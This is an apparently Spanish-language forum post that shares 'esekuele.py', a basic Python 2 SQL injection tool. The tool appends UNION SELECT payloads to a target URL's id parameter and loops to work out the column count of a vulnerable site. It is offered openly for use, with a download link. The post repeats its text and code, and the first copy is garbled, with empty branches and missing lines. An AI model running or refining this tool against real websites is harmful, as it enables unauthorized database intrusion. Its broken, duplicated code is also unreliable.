Bueno esta es la primera version de esekuele conforme vaya teniendo mas tiempo y mas ideas la tratare de ir mejorando
hasta ahorita esta muuuuucho muy basica, lo unico que hace es verificar si la pagina es vulnerable si devuelve la cadena:
The used SELECT statements have a different number of columns
y de ahi sacar el numero de columnas.
ver si despues meterle un ataque de columnas mediante diccionario, conforme vaya teniendo mas tiempo y tambien si tienen ideas son
aceptadas para ver que mas le podemos poner :-D
aqui les dejo el code:
y les adjunto el archivo y un screen de como funciona :
http://hslteam.org/esekuele.rar
hasta ahorita esta muuuuucho muy basica, lo unico que hace es verificar si la pagina es vulnerable si devuelve la cadena:
The used SELECT statements have a different number of columns
y de ahi sacar el numero de columnas.
ver si despues meterle un ataque de columnas mediante diccionario, conforme vaya teniendo mas tiempo y tambien si tienen ideas son
aceptadas para ver que mas le podemos poner :-D
aqui les dejo el code:
import urllib2
import string
uno = "-1/**/union/**/select/**/"
dos = "-1+union+select+/"
print '\n |-----------------------------------------------------------|'
print '\n |----| Komtec1 www.hslteam.org komtec1[at]gmail[dot]com |---|'
print '\n |-------------------| esekuele.py |-------------------------|'
print '\n |-----------------------------------------------------------|'
print '\n |Uso: \n Ingresa Url: '
print '\n |http://www.pagina.com.mx/index.php?id='
print '\n |Donde: id es la variable vulnerable'
print '\n |-----------------------------------------------------------\n\n'
print '\nIngresa la Url'
url2 = raw_input("")
print '\nEscoje la Inyexion:'
print '\n1: -1/**/union/**/select/**/'
print '\npronto mas xD'
iny = raw_input("")
if iny == '1':
#elif iny == '2':
#
else:
a = "1"
sql = url + a + "/*"
vulnerable = urllib2.urlopen(sql)
vulnerable2 = vulnerable.read()
if vulnerable2.find("The used SELECT statements have a different number of columns") >= 0:
else:
b = 2
for x in range(1, 2000):
import string
uno = "-1/**/union/**/select/**/"
dos = "-1+union+select+/"
print '\n |-----------------------------------------------------------|'
print '\n |----| Komtec1 www.hslteam.org komtec1[at]gmail[dot]com |---|'
print '\n |-------------------| esekuele.py |-------------------------|'
print '\n |-----------------------------------------------------------|'
print '\n |Uso: \n Ingresa Url: '
print '\n |http://www.pagina.com.mx/index.php?id='
print '\n |Donde: id es la variable vulnerable'
print '\n |-----------------------------------------------------------\n\n'
print '\nIngresa la Url'
url2 = raw_input("")
print '\nEscoje la Inyexion:'
print '\n1: -1/**/union/**/select/**/'
print '\npronto mas xD'
iny = raw_input("")
if iny == '1':
url = url2 + uno
#elif iny == '2':
#
url = url2 + dos
else:
print '\nYou think you could fool me -.-'
exit()
a = "1"
sql = url + a + "/*"
vulnerable = urllib2.urlopen(sql)
vulnerable2 = vulnerable.read()
if vulnerable2.find("The used SELECT statements have a different number of columns") >= 0:
print "Es vulnerable, continua el proceso...."
else:
print "No es vulnerable o al menos el inyector no lo detecta xD"
exit()
b = 2
for x in range(1, 2000):
print url + a + "/*"
sql = url + a + "/*"
iny = urllib2.urlopen(sql)
chekar = iny.read()
if chekar.find("The used SELECT statements have a different number of columns") >= 0:
print "aumentanto columna"
else:
print "Columnas encontradas... lucky strike!!!"
print url + a + "/*"
print "Have fun!! :-D"
exit()
print iny.read()
iny.close()
str(a)
a = a + "," + str(b)
b = b + 1
y les adjunto el archivo y un screen de como funciona :
http://hslteam.org/esekuele.rar
Comentarios